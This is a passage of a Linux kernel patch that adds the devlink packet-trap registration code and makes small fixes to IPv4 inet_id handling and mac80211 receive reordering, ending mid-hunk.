++	DEVLINK_TRAP(MPLS_PARSING, DROP),
++	DEVLINK_TRAP(ARP_PARSING, DROP),
++	DEVLINK_TRAP(IP_1_PARSING, DROP),
++	DEVLINK_TRAP(IP_N_PARSING, DROP),
++	DEVLINK_TRAP(GRE_PARSING, DROP),
++	DEVLINK_TRAP(UDP_PARSING, DROP),
++	DEVLINK_TRAP(TCP_PARSING, DROP),
++	DEVLINK_TRAP(IPSEC_PARSING, DROP),
++	DEVLINK_TRAP(SCTP_PARSING, DROP),
++	DEVLINK_TRAP(DCCP_PARSING, DROP),
++	DEVLINK_TRAP(GTP_PARSING, DROP),
++	DEVLINK_TRAP(ESP_PARSING, DROP),
++	DEVLINK_TRAP(BLACKHOLE_NEXTHOP, DROP),
++	DEVLINK_TRAP(DMAC_FILTER, DROP),
++};
++
++#define DEVLINK_TRAP_GROUP(_id)						      \
++	{								      \
++		.id = DEVLINK_TRAP_GROUP_GENERIC_ID_##_id,		      \
++		.name = DEVLINK_TRAP_GROUP_GENERIC_NAME_##_id,		      \
++	}
++
++static const struct devlink_trap_group devlink_trap_group_generic[] = {
++	DEVLINK_TRAP_GROUP(L2_DROPS),
++	DEVLINK_TRAP_GROUP(L3_DROPS),
++	DEVLINK_TRAP_GROUP(L3_EXCEPTIONS),
++	DEVLINK_TRAP_GROUP(BUFFER_DROPS),
++	DEVLINK_TRAP_GROUP(TUNNEL_DROPS),
++	DEVLINK_TRAP_GROUP(ACL_DROPS),
++	DEVLINK_TRAP_GROUP(STP),
++	DEVLINK_TRAP_GROUP(LACP),
++	DEVLINK_TRAP_GROUP(LLDP),
++	DEVLINK_TRAP_GROUP(MC_SNOOPING),
++	DEVLINK_TRAP_GROUP(DHCP),
++	DEVLINK_TRAP_GROUP(NEIGH_DISCOVERY),
++	DEVLINK_TRAP_GROUP(BFD),
++	DEVLINK_TRAP_GROUP(OSPF),
++	DEVLINK_TRAP_GROUP(BGP),
++	DEVLINK_TRAP_GROUP(VRRP),
++	DEVLINK_TRAP_GROUP(PIM),
++	DEVLINK_TRAP_GROUP(UC_LB),
++	DEVLINK_TRAP_GROUP(LOCAL_DELIVERY),
++	DEVLINK_TRAP_GROUP(EXTERNAL_DELIVERY),
++	DEVLINK_TRAP_GROUP(IPV6),
++	DEVLINK_TRAP_GROUP(PTP_EVENT),
++	DEVLINK_TRAP_GROUP(PTP_GENERAL),
++	DEVLINK_TRAP_GROUP(ACL_SAMPLE),
++	DEVLINK_TRAP_GROUP(ACL_TRAP),
++	DEVLINK_TRAP_GROUP(PARSER_ERROR_DROPS),
++};
++
++static int devlink_trap_generic_verify(const struct devlink_trap *trap)
++{
++	if (trap->id > DEVLINK_TRAP_GENERIC_ID_MAX)
++		return -EINVAL;
++
++	if (strcmp(trap->name, devlink_trap_generic[trap->id].name))
++		return -EINVAL;
++
++	if (trap->type != devlink_trap_generic[trap->id].type)
++		return -EINVAL;
++
++	return 0;
++}
++
++static int devlink_trap_driver_verify(const struct devlink_trap *trap)
++{
++	int i;
++
++	if (trap->id <= DEVLINK_TRAP_GENERIC_ID_MAX)
++		return -EINVAL;
++
++	for (i = 0; i < ARRAY_SIZE(devlink_trap_generic); i++) {
++		if (!strcmp(trap->name, devlink_trap_generic[i].name))
++			return -EEXIST;
++	}
++
++	return 0;
++}
++
++static int devlink_trap_verify(const struct devlink_trap *trap)
++{
++	if (!trap || !trap->name)
++		return -EINVAL;
++
++	if (trap->generic)
++		return devlink_trap_generic_verify(trap);
++	else
++		return devlink_trap_driver_verify(trap);
++}
++
++static int
++devlink_trap_group_generic_verify(const struct devlink_trap_group *group)
++{
++	if (group->id > DEVLINK_TRAP_GROUP_GENERIC_ID_MAX)
++		return -EINVAL;
++
++	if (strcmp(group->name, devlink_trap_group_generic[group->id].name))
++		return -EINVAL;
++
++	return 0;
++}
++
++static int
++devlink_trap_group_driver_verify(const struct devlink_trap_group *group)
++{
++	int i;
++
++	if (group->id <= DEVLINK_TRAP_GROUP_GENERIC_ID_MAX)
++		return -EINVAL;
++
++	for (i = 0; i < ARRAY_SIZE(devlink_trap_group_generic); i++) {
++		if (!strcmp(group->name, devlink_trap_group_generic[i].name))
++			return -EEXIST;
++	}
++
++	return 0;
++}
++
++static int devlink_trap_group_verify(const struct devlink_trap_group *group)
++{
++	if (group->generic)
++		return devlink_trap_group_generic_verify(group);
++	else
++		return devlink_trap_group_driver_verify(group);
++}
++
++static void
++devlink_trap_group_notify(struct devlink *devlink,
++			  const struct devlink_trap_group_item *group_item,
++			  enum devlink_command cmd)
++{
++	struct sk_buff *msg;
++	int err;
++
++	WARN_ON_ONCE(cmd != DEVLINK_CMD_TRAP_GROUP_NEW &&
++		     cmd != DEVLINK_CMD_TRAP_GROUP_DEL);
++	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
++		return;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return;
++
++	err = devlink_nl_trap_group_fill(msg, devlink, group_item, cmd, 0, 0,
++					 0);
++	if (err) {
++		nlmsg_free(msg);
++		return;
++	}
++
++	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink),
++				msg, 0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
++}
++
++static int
++devlink_trap_item_group_link(struct devlink *devlink,
++			     struct devlink_trap_item *trap_item)
++{
++	u16 group_id = trap_item->trap->init_group_id;
++	struct devlink_trap_group_item *group_item;
++
++	group_item = devlink_trap_group_item_lookup_by_id(devlink, group_id);
++	if (WARN_ON_ONCE(!group_item))
++		return -EINVAL;
++
++	trap_item->group_item = group_item;
++
++	return 0;
++}
++
++static void devlink_trap_notify(struct devlink *devlink,
++				const struct devlink_trap_item *trap_item,
++				enum devlink_command cmd)
++{
++	struct sk_buff *msg;
++	int err;
++
++	WARN_ON_ONCE(cmd != DEVLINK_CMD_TRAP_NEW &&
++		     cmd != DEVLINK_CMD_TRAP_DEL);
++	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
++		return;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return;
++
++	err = devlink_nl_trap_fill(msg, devlink, trap_item, cmd, 0, 0, 0);
++	if (err) {
++		nlmsg_free(msg);
++		return;
++	}
++
++	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink),
++				msg, 0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
++}
++
++static int
++devlink_trap_register(struct devlink *devlink,
++		      const struct devlink_trap *trap, void *priv)
++{
++	struct devlink_trap_item *trap_item;
++	int err;
++
++	if (devlink_trap_item_lookup(devlink, trap->name))
++		return -EEXIST;
++
++	trap_item = kzalloc(sizeof(*trap_item), GFP_KERNEL);
++	if (!trap_item)
++		return -ENOMEM;
++
++	trap_item->stats = netdev_alloc_pcpu_stats(struct devlink_stats);
++	if (!trap_item->stats) {
++		err = -ENOMEM;
++		goto err_stats_alloc;
++	}
++
++	trap_item->trap = trap;
++	trap_item->action = trap->init_action;
++	trap_item->priv = priv;
++
++	err = devlink_trap_item_group_link(devlink, trap_item);
++	if (err)
++		goto err_group_link;
++
++	err = devlink->ops->trap_init(devlink, trap, trap_item);
++	if (err)
++		goto err_trap_init;
++
++	list_add_tail(&trap_item->list, &devlink->trap_list);
++	devlink_trap_notify(devlink, trap_item, DEVLINK_CMD_TRAP_NEW);
++
++	return 0;
++
++err_trap_init:
++err_group_link:
++	free_percpu(trap_item->stats);
++err_stats_alloc:
++	kfree(trap_item);
++	return err;
++}
++
++static void devlink_trap_unregister(struct devlink *devlink,
++				    const struct devlink_trap *trap)
++{
++	struct devlink_trap_item *trap_item;
++
++	trap_item = devlink_trap_item_lookup(devlink, trap->name);
++	if (WARN_ON_ONCE(!trap_item))
++		return;
++
++	devlink_trap_notify(devlink, trap_item, DEVLINK_CMD_TRAP_DEL);
++	list_del(&trap_item->list);
++	if (devlink->ops->trap_fini)
++		devlink->ops->trap_fini(devlink, trap, trap_item);
++	free_percpu(trap_item->stats);
++	kfree(trap_item);
++}
++
++static void devlink_trap_disable(struct devlink *devlink,
++				 const struct devlink_trap *trap)
++{
++	struct devlink_trap_item *trap_item;
++
++	trap_item = devlink_trap_item_lookup(devlink, trap->name);
++	if (WARN_ON_ONCE(!trap_item))
++		return;
++
++	devlink->ops->trap_action_set(devlink, trap, DEVLINK_TRAP_ACTION_DROP,
++				      NULL);
++	trap_item->action = DEVLINK_TRAP_ACTION_DROP;
++}
++
++/**
++ * devl_traps_register - Register packet traps with devlink.
++ * @devlink: devlink.
++ * @traps: Packet traps.
++ * @traps_count: Count of provided packet traps.
++ * @priv: Driver private information.
++ *
++ * Return: Non-zero value on failure.
++ */
++int devl_traps_register(struct devlink *devlink,
++			const struct devlink_trap *traps,
++			size_t traps_count, void *priv)
++{
++	int i, err;
++
++	if (!devlink->ops->trap_init || !devlink->ops->trap_action_set)
++		return -EINVAL;
++
++	devl_assert_locked(devlink);
++	for (i = 0; i < traps_count; i++) {
++		const struct devlink_trap *trap = &traps[i];
++
++		err = devlink_trap_verify(trap);
++		if (err)
++			goto err_trap_verify;
++
++		err = devlink_trap_register(devlink, trap, priv);
++		if (err)
++			goto err_trap_register;
++	}
++
++	return 0;
++
++err_trap_register:
++err_trap_verify:
++	for (i--; i >= 0; i--)
++		devlink_trap_unregister(devlink, &traps[i]);
++	return err;
++}
++EXPORT_SYMBOL_GPL(devl_traps_register);
++
++/**
++ * devlink_traps_register - Register packet traps with devlink.
++ * @devlink: devlink.
++ * @traps: Packet traps.
++ * @traps_count: Count of provided packet traps.
++ * @priv: Driver private information.
++ *
++ * Context: Takes and release devlink->lock <mutex>.
++ *
++ * Return: Non-zero value on failure.
++ */
++int devlink_traps_register(struct devlink *devlink,
++			   const struct devlink_trap *traps,
++			   size_t traps_count, void *priv)
++{
++	int err;
++
++	devl_lock(devlink);
++	err = devl_traps_register(devlink, traps, traps_count, priv);
++	devl_unlock(devlink);
++	return err;
++}
++EXPORT_SYMBOL_GPL(devlink_traps_register);
++
++/**
++ * devl_traps_unregister - Unregister packet traps from devlink.
++ * @devlink: devlink.
++ * @traps: Packet traps.
++ * @traps_count: Count of provided packet traps.
++ */
++void devl_traps_unregister(struct devlink *devlink,
++			   const struct devlink_trap *traps,
++			   size_t traps_count)
++{
++	int i;
++
++	devl_assert_locked(devlink);
++	/* Make sure we do not have any packets in-flight while unregistering
++	 * traps by disabling all of them and waiting for a grace period.
++	 */
++	for (i = traps_count - 1; i >= 0; i--)
++		devlink_trap_disable(devlink, &traps[i]);
++	synchronize_rcu();
++	for (i = traps_count - 1; i >= 0; i--)
++		devlink_trap_unregister(devlink, &traps[i]);
++}
++EXPORT_SYMBOL_GPL(devl_traps_unregister);
++
++/**
++ * devlink_traps_unregister - Unregister packet traps from devlink.
++ * @devlink: devlink.
++ * @traps: Packet traps.
++ * @traps_count: Count of provided packet traps.
++ *
++ * Context: Takes and release devlink->lock <mutex>.
++ */
++void devlink_traps_unregister(struct devlink *devlink,
++			      const struct devlink_trap *traps,
++			      size_t traps_count)
++{
++	devl_lock(devlink);
++	devl_traps_unregister(devlink, traps, traps_count);
++	devl_unlock(devlink);
++}
++EXPORT_SYMBOL_GPL(devlink_traps_unregister);
++
++static void
++devlink_trap_stats_update(struct devlink_stats __percpu *trap_stats,
++			  size_t skb_len)
++{
++	struct devlink_stats *stats;
++
++	stats = this_cpu_ptr(trap_stats);
++	u64_stats_update_begin(&stats->syncp);
++	u64_stats_add(&stats->rx_bytes, skb_len);
++	u64_stats_inc(&stats->rx_packets);
++	u64_stats_update_end(&stats->syncp);
++}
++
++static void
++devlink_trap_report_metadata_set(struct devlink_trap_metadata *metadata,
++				 const struct devlink_trap_item *trap_item,
++				 struct devlink_port *in_devlink_port,
++				 const struct flow_action_cookie *fa_cookie)
++{
++	metadata->trap_name = trap_item->trap->name;
++	metadata->trap_group_name = trap_item->group_item->group->name;
++	metadata->fa_cookie = fa_cookie;
++	metadata->trap_type = trap_item->trap->type;
++
++	spin_lock(&in_devlink_port->type_lock);
++	if (in_devlink_port->type == DEVLINK_PORT_TYPE_ETH)
++		metadata->input_dev = in_devlink_port->type_dev;
++	spin_unlock(&in_devlink_port->type_lock);
++}
++
++/**
++ * devlink_trap_report - Report trapped packet to drop monitor.
++ * @devlink: devlink.
++ * @skb: Trapped packet.
++ * @trap_ctx: Trap context.
++ * @in_devlink_port: Input devlink port.
++ * @fa_cookie: Flow action cookie. Could be NULL.
++ */
++void devlink_trap_report(struct devlink *devlink, struct sk_buff *skb,
++			 void *trap_ctx, struct devlink_port *in_devlink_port,
++			 const struct flow_action_cookie *fa_cookie)
++
++{
++	struct devlink_trap_item *trap_item = trap_ctx;
++
++	devlink_trap_stats_update(trap_item->stats, skb->len);
++	devlink_trap_stats_update(trap_item->group_item->stats, skb->len);
++
++	if (trace_devlink_trap_report_enabled()) {
++		struct devlink_trap_metadata metadata = {};
++
++		devlink_trap_report_metadata_set(&metadata, trap_item,
++						 in_devlink_port, fa_cookie);
++		trace_devlink_trap_report(devlink, skb, &metadata);
++	}
++}
++EXPORT_SYMBOL_GPL(devlink_trap_report);
++
++/**
++ * devlink_trap_ctx_priv - Trap context to driver private information.
++ * @trap_ctx: Trap context.
++ *
++ * Return: Driver private information passed during registration.
++ */
++void *devlink_trap_ctx_priv(void *trap_ctx)
++{
++	struct devlink_trap_item *trap_item = trap_ctx;
++
++	return trap_item->priv;
++}
++EXPORT_SYMBOL_GPL(devlink_trap_ctx_priv);
++
++static int
++devlink_trap_group_item_policer_link(struct devlink *devlink,
++				     struct devlink_trap_group_item *group_item)
++{
++	u32 policer_id = group_item->group->init_policer_id;
++	struct devlink_trap_policer_item *policer_item;
++
++	if (policer_id == 0)
++		return 0;
++
++	policer_item = devlink_trap_policer_item_lookup(devlink, policer_id);
++	if (WARN_ON_ONCE(!policer_item))
++		return -EINVAL;
++
++	group_item->policer_item = policer_item;
++
++	return 0;
++}
++
++static int
++devlink_trap_group_register(struct devlink *devlink,
++			    const struct devlink_trap_group *group)
++{
++	struct devlink_trap_group_item *group_item;
++	int err;
++
++	if (devlink_trap_group_item_lookup(devlink, group->name))
++		return -EEXIST;
++
++	group_item = kzalloc(sizeof(*group_item), GFP_KERNEL);
++	if (!group_item)
++		return -ENOMEM;
++
++	group_item->stats = netdev_alloc_pcpu_stats(struct devlink_stats);
++	if (!group_item->stats) {
++		err = -ENOMEM;
++		goto err_stats_alloc;
++	}
++
++	group_item->group = group;
++
++	err = devlink_trap_group_item_policer_link(devlink, group_item);
++	if (err)
++		goto err_policer_link;
++
++	if (devlink->ops->trap_group_init) {
++		err = devlink->ops->trap_group_init(devlink, group);
++		if (err)
++			goto err_group_init;
++	}
++
++	list_add_tail(&group_item->list, &devlink->trap_group_list);
++	devlink_trap_group_notify(devlink, group_item,
++				  DEVLINK_CMD_TRAP_GROUP_NEW);
++
++	return 0;
++
++err_group_init:
++err_policer_link:
++	free_percpu(group_item->stats);
++err_stats_alloc:
++	kfree(group_item);
++	return err;
++}
++
++static void
++devlink_trap_group_unregister(struct devlink *devlink,
++			      const struct devlink_trap_group *group)
++{
++	struct devlink_trap_group_item *group_item;
++
++	group_item = devlink_trap_group_item_lookup(devlink, group->name);
++	if (WARN_ON_ONCE(!group_item))
++		return;
++
++	devlink_trap_group_notify(devlink, group_item,
++				  DEVLINK_CMD_TRAP_GROUP_DEL);
++	list_del(&group_item->list);
++	free_percpu(group_item->stats);
++	kfree(group_item);
++}
++
++/**
++ * devl_trap_groups_register - Register packet trap groups with devlink.
++ * @devlink: devlink.
++ * @groups: Packet trap groups.
++ * @groups_count: Count of provided packet trap groups.
++ *
++ * Return: Non-zero value on failure.
++ */
++int devl_trap_groups_register(struct devlink *devlink,
++			      const struct devlink_trap_group *groups,
++			      size_t groups_count)
++{
++	int i, err;
++
++	devl_assert_locked(devlink);
++	for (i = 0; i < groups_count; i++) {
++		const struct devlink_trap_group *group = &groups[i];
++
++		err = devlink_trap_group_verify(group);
++		if (err)
++			goto err_trap_group_verify;
++
++		err = devlink_trap_group_register(devlink, group);
++		if (err)
++			goto err_trap_group_register;
++	}
++
++	return 0;
++
++err_trap_group_register:
++err_trap_group_verify:
++	for (i--; i >= 0; i--)
++		devlink_trap_group_unregister(devlink, &groups[i]);
++	return err;
++}
++EXPORT_SYMBOL_GPL(devl_trap_groups_register);
++
++/**
++ * devlink_trap_groups_register - Register packet trap groups with devlink.
++ * @devlink: devlink.
++ * @groups: Packet trap groups.
++ * @groups_count: Count of provided packet trap groups.
++ *
++ * Context: Takes and release devlink->lock <mutex>.
++ *
++ * Return: Non-zero value on failure.
++ */
++int devlink_trap_groups_register(struct devlink *devlink,
++				 const struct devlink_trap_group *groups,
++				 size_t groups_count)
++{
++	int err;
++
++	devl_lock(devlink);
++	err = devl_trap_groups_register(devlink, groups, groups_count);
++	devl_unlock(devlink);
++	return err;
++}
++EXPORT_SYMBOL_GPL(devlink_trap_groups_register);
++
++/**
++ * devl_trap_groups_unregister - Unregister packet trap groups from devlink.
++ * @devlink: devlink.
++ * @groups: Packet trap groups.
++ * @groups_count: Count of provided packet trap groups.
++ */
++void devl_trap_groups_unregister(struct devlink *devlink,
++				 const struct devlink_trap_group *groups,
++				 size_t groups_count)
++{
++	int i;
++
++	devl_assert_locked(devlink);
++	for (i = groups_count - 1; i >= 0; i--)
++		devlink_trap_group_unregister(devlink, &groups[i]);
++}
++EXPORT_SYMBOL_GPL(devl_trap_groups_unregister);
++
++/**
++ * devlink_trap_groups_unregister - Unregister packet trap groups from devlink.
++ * @devlink: devlink.
++ * @groups: Packet trap groups.
++ * @groups_count: Count of provided packet trap groups.
++ *
++ * Context: Takes and release devlink->lock <mutex>.
++ */
++void devlink_trap_groups_unregister(struct devlink *devlink,
++				    const struct devlink_trap_group *groups,
++				    size_t groups_count)
++{
++	devl_lock(devlink);
++	devl_trap_groups_unregister(devlink, groups, groups_count);
++	devl_unlock(devlink);
++}
++EXPORT_SYMBOL_GPL(devlink_trap_groups_unregister);
++
++static void
++devlink_trap_policer_notify(struct devlink *devlink,
++			    const struct devlink_trap_policer_item *policer_item,
++			    enum devlink_command cmd)
++{
++	struct sk_buff *msg;
++	int err;
++
++	WARN_ON_ONCE(cmd != DEVLINK_CMD_TRAP_POLICER_NEW &&
++		     cmd != DEVLINK_CMD_TRAP_POLICER_DEL);
++	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
++		return;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return;
++
++	err = devlink_nl_trap_policer_fill(msg, devlink, policer_item, cmd, 0,
++					   0, 0);
++	if (err) {
++		nlmsg_free(msg);
++		return;
++	}
++
++	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink),
++				msg, 0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
++}
++
++static int
++devlink_trap_policer_register(struct devlink *devlink,
++			      const struct devlink_trap_policer *policer)
++{
++	struct devlink_trap_policer_item *policer_item;
++	int err;
++
++	if (devlink_trap_policer_item_lookup(devlink, policer->id))
++		return -EEXIST;
++
++	policer_item = kzalloc(sizeof(*policer_item), GFP_KERNEL);
++	if (!policer_item)
++		return -ENOMEM;
++
++	policer_item->policer = policer;
++	policer_item->rate = policer->init_rate;
++	policer_item->burst = policer->init_burst;
++
++	if (devlink->ops->trap_policer_init) {
++		err = devlink->ops->trap_policer_init(devlink, policer);
++		if (err)
++			goto err_policer_init;
++	}
++
++	list_add_tail(&policer_item->list, &devlink->trap_policer_list);
++	devlink_trap_policer_notify(devlink, policer_item,
++				    DEVLINK_CMD_TRAP_POLICER_NEW);
++
++	return 0;
++
++err_policer_init:
++	kfree(policer_item);
++	return err;
++}
++
++static void
++devlink_trap_policer_unregister(struct devlink *devlink,
++				const struct devlink_trap_policer *policer)
++{
++	struct devlink_trap_policer_item *policer_item;
++
++	policer_item = devlink_trap_policer_item_lookup(devlink, policer->id);
++	if (WARN_ON_ONCE(!policer_item))
++		return;
++
++	devlink_trap_policer_notify(devlink, policer_item,
++				    DEVLINK_CMD_TRAP_POLICER_DEL);
++	list_del(&policer_item->list);
++	if (devlink->ops->trap_policer_fini)
++		devlink->ops->trap_policer_fini(devlink, policer);
++	kfree(policer_item);
++}
++
++/**
++ * devl_trap_policers_register - Register packet trap policers with devlink.
++ * @devlink: devlink.
++ * @policers: Packet trap policers.
++ * @policers_count: Count of provided packet trap policers.
++ *
++ * Return: Non-zero value on failure.
++ */
++int
++devl_trap_policers_register(struct devlink *devlink,
++			    const struct devlink_trap_policer *policers,
++			    size_t policers_count)
++{
++	int i, err;
++
++	devl_assert_locked(devlink);
++	for (i = 0; i < policers_count; i++) {
++		const struct devlink_trap_policer *policer = &policers[i];
++
++		if (WARN_ON(policer->id == 0 ||
++			    policer->max_rate < policer->min_rate ||
++			    policer->max_burst < policer->min_burst)) {
++			err = -EINVAL;
++			goto err_trap_policer_verify;
++		}
++
++		err = devlink_trap_policer_register(devlink, policer);
++		if (err)
++			goto err_trap_policer_register;
++	}
++	return 0;
++
++err_trap_policer_register:
++err_trap_policer_verify:
++	for (i--; i >= 0; i--)
++		devlink_trap_policer_unregister(devlink, &policers[i]);
++	return err;
++}
++EXPORT_SYMBOL_GPL(devl_trap_policers_register);
++
++/**
++ * devl_trap_policers_unregister - Unregister packet trap policers from devlink.
++ * @devlink: devlink.
++ * @policers: Packet trap policers.
++ * @policers_count: Count of provided packet trap policers.
++ */
++void
++devl_trap_policers_unregister(struct devlink *devlink,
++			      const struct devlink_trap_policer *policers,
++			      size_t policers_count)
++{
++	int i;
++
++	devl_assert_locked(devlink);
++	for (i = policers_count - 1; i >= 0; i--)
++		devlink_trap_policer_unregister(devlink, &policers[i]);
++}
++EXPORT_SYMBOL_GPL(devl_trap_policers_unregister);
++
++static void __devlink_compat_running_version(struct devlink *devlink,
++					     char *buf, size_t len)
++{
++	struct devlink_info_req req = {};
++	const struct nlattr *nlattr;
++	struct sk_buff *msg;
++	int rem, err;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return;
++
++	req.msg = msg;
++	err = devlink->ops->info_get(devlink, &req, NULL);
++	if (err)
++		goto free_msg;
++
++	nla_for_each_attr(nlattr, (void *)msg->data, msg->len, rem) {
++		const struct nlattr *kv;
++		int rem_kv;
++
++		if (nla_type(nlattr) != DEVLINK_ATTR_INFO_VERSION_RUNNING)
++			continue;
++
++		nla_for_each_nested(kv, nlattr, rem_kv) {
++			if (nla_type(kv) != DEVLINK_ATTR_INFO_VERSION_VALUE)
++				continue;
++
++			strlcat(buf, nla_data(kv), len);
++			strlcat(buf, " ", len);
++		}
++	}
++free_msg:
++	nlmsg_free(msg);
++}
++
++static struct devlink_port *netdev_to_devlink_port(struct net_device *dev)
++{
++	if (!dev->netdev_ops->ndo_get_devlink_port)
++		return NULL;
++
++	return dev->netdev_ops->ndo_get_devlink_port(dev);
++}
++
++void devlink_compat_running_version(struct devlink *devlink,
++				    char *buf, size_t len)
++{
++	if (!devlink->ops->info_get)
++		return;
++
++	devl_lock(devlink);
++	__devlink_compat_running_version(devlink, buf, len);
++	devl_unlock(devlink);
++}
++
++int devlink_compat_flash_update(struct devlink *devlink, const char *file_name)
++{
++	struct devlink_flash_update_params params = {};
++	int ret;
++
++	if (!devlink->ops->flash_update)
++		return -EOPNOTSUPP;
++
++	ret = request_firmware(&params.fw, file_name, devlink->dev);
++	if (ret)
++		return ret;
++
++	devl_lock(devlink);
++	devlink_flash_update_begin_notify(devlink);
++	ret = devlink->ops->flash_update(devlink, &params, NULL);
++	devlink_flash_update_end_notify(devlink);
++	devl_unlock(devlink);
++
++	release_firmware(params.fw);
++
++	return ret;
++}
++
++int devlink_compat_phys_port_name_get(struct net_device *dev,
++				      char *name, size_t len)
++{
++	struct devlink_port *devlink_port;
++
++	/* RTNL mutex is held here which ensures that devlink_port
++	 * instance cannot disappear in the middle. No need to take
++	 * any devlink lock as only permanent values are accessed.
++	 */
++	ASSERT_RTNL();
++
++	devlink_port = netdev_to_devlink_port(dev);
++	if (!devlink_port)
++		return -EOPNOTSUPP;
++
++	return __devlink_port_phys_port_name_get(devlink_port, name, len);
++}
++
++int devlink_compat_switch_id_get(struct net_device *dev,
++				 struct netdev_phys_item_id *ppid)
++{
++	struct devlink_port *devlink_port;
++
++	/* Caller must hold RTNL mutex or reference to dev, which ensures that
++	 * devlink_port instance cannot disappear in the middle. No need to take
++	 * any devlink lock as only permanent values are accessed.
++	 */
++	devlink_port = netdev_to_devlink_port(dev);
++	if (!devlink_port || !devlink_port->switch_port)
++		return -EOPNOTSUPP;
++
++	memcpy(ppid, &devlink_port->attrs.switch_id, sizeof(*ppid));
++
++	return 0;
++}
++
++static void __net_exit devlink_pernet_pre_exit(struct net *net)
++{
++	struct devlink *devlink;
++	u32 actions_performed;
++	unsigned long index;
++	int err;
++
++	/* In case network namespace is getting destroyed, reload
++	 * all devlink instances from this namespace into init_net.
++	 */
++	devlinks_xa_for_each_registered_get(net, index, devlink) {
++		WARN_ON(!(devlink->features & DEVLINK_F_RELOAD));
++		mutex_lock(&devlink->lock);
++		err = devlink_reload(devlink, &init_net,
++				     DEVLINK_RELOAD_ACTION_DRIVER_REINIT,
++				     DEVLINK_RELOAD_LIMIT_UNSPEC,
++				     &actions_performed, NULL);
++		mutex_unlock(&devlink->lock);
++		if (err && err != -EOPNOTSUPP)
++			pr_warn("Failed to reload devlink instance into init_net\n");
++		devlink_put(devlink);
++	}
++}
++
++static struct pernet_operations devlink_pernet_ops __net_initdata = {
++	.pre_exit = devlink_pernet_pre_exit,
++};
++
++static int __init devlink_init(void)
++{
++	int err;
++
++	err = genl_register_family(&devlink_nl_family);
++	if (err)
++		goto out;
++	err = register_pernet_subsys(&devlink_pernet_ops);
++
++out:
++	WARN_ON(err);
++	return err;
++}
++
++subsys_initcall(devlink_init);
+diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c
+index ebb737ac9e894..04853c83c85c4 100644
+--- a/net/ipv4/af_inet.c
++++ b/net/ipv4/af_inet.c
+@@ -340,7 +340,7 @@ lookup_protocol:
+ 	else
+ 		inet->pmtudisc = IP_PMTUDISC_WANT;
+ 
+-	inet->inet_id = 0;
++	atomic_set(&inet->inet_id, 0);
+ 
+ 	sock_init_data(sock, sk);
+ 
+diff --git a/net/ipv4/datagram.c b/net/ipv4/datagram.c
+index 4d1af0cd7d99e..cb5dbee9e018f 100644
+--- a/net/ipv4/datagram.c
++++ b/net/ipv4/datagram.c
+@@ -73,7 +73,7 @@ int __ip4_datagram_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len
+ 	reuseport_has_conns_set(sk);
+ 	sk->sk_state = TCP_ESTABLISHED;
+ 	sk_set_txhash(sk);
+-	inet->inet_id = get_random_u16();
++	atomic_set(&inet->inet_id, get_random_u16());
+ 
+ 	sk_dst_set(sk, &rt->dst);
+ 	err = 0;
+diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
+index 08921b96f9728..f9b8a4a1d2edc 100644
+--- a/net/ipv4/tcp_ipv4.c
++++ b/net/ipv4/tcp_ipv4.c
+@@ -312,7 +312,7 @@ int tcp_v4_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len)
+ 					     inet->inet_daddr));
+ 	}
+ 
+-	inet->inet_id = get_random_u16();
++	atomic_set(&inet->inet_id, get_random_u16());
+ 
+ 	if (tcp_fastopen_defer_connect(sk, &err))
+ 		return err;
+@@ -1539,7 +1539,7 @@ struct sock *tcp_v4_syn_recv_sock(const struct sock *sk, struct sk_buff *skb,
+ 	inet_csk(newsk)->icsk_ext_hdr_len = 0;
+ 	if (inet_opt)
+ 		inet_csk(newsk)->icsk_ext_hdr_len = inet_opt->opt.optlen;
+-	newinet->inet_id = get_random_u16();
++	atomic_set(&newinet->inet_id, get_random_u16());
+ 
+ 	/* Set ToS of the new socket based upon the value of incoming SYN.
+ 	 * ECT bits are set later in tcp_init_transfer().
+diff --git a/net/mac80211/rx.c b/net/mac80211/rx.c
+index 0f81492da0b46..55dc0610e8633 100644
+--- a/net/mac80211/rx.c
++++ b/net/mac80211/rx.c
+@@ -1102,7 +1102,8 @@ static inline bool ieee80211_rx_reorder_ready(struct tid_ampdu_rx *tid_agg_rx,
+ 	struct sk_buff *tail = skb_peek_tail(frames);
+ 	struct ieee80211_rx_status *status;
+ 
+-	if (tid_agg_rx->reorder_buf_filtered & BIT_ULL(index))
++	if (tid_agg_rx->reorder_buf_filtered &&
++	    tid_agg_rx->reorder_buf_filtered & BIT_ULL(index))
+ 		return true;
+ 
+ 	if (!tail)
+@@ -1143,7 +1144,8 @@ static void ieee80211_release_reorder_frame(struct ieee80211_sub_if_data *sdata,
+ 	}
+ 
+ no_frame:
+-	tid_agg_rx->reorder_buf_filtered &= ~BIT_ULL(index);
++	if (tid_agg_rx->reorder_buf_filtered)
++		tid_agg_rx->reorder_buf_filtered &= ~BIT_ULL(index);
+ 	tid_agg_rx->head_seq_num = ieee80211_sn_inc(tid_agg_rx->head_seq_num);
+ }
+ 
+@@ -4162,6 +4164,7 @@ void ieee80211_mark_rx_ba_filtered_frames(struct ieee80211_sta *pubsta, u8 tid,
+ 					  u16 ssn, u64 filtered,
+ 					  u16 received_mpdus)
+ {
++	struct ieee80211_local *local;
+ 	struct sta_info *sta;
+ 	struct tid_ampdu_rx *tid_agg_rx;
+ 	struct sk_buff_head frames;
+@@ -4179,6 +4182,11 @@ void ieee80211_mark_rx_ba_filtered_frames(struct ieee80211_sta *pubsta, u8 tid,
+ 
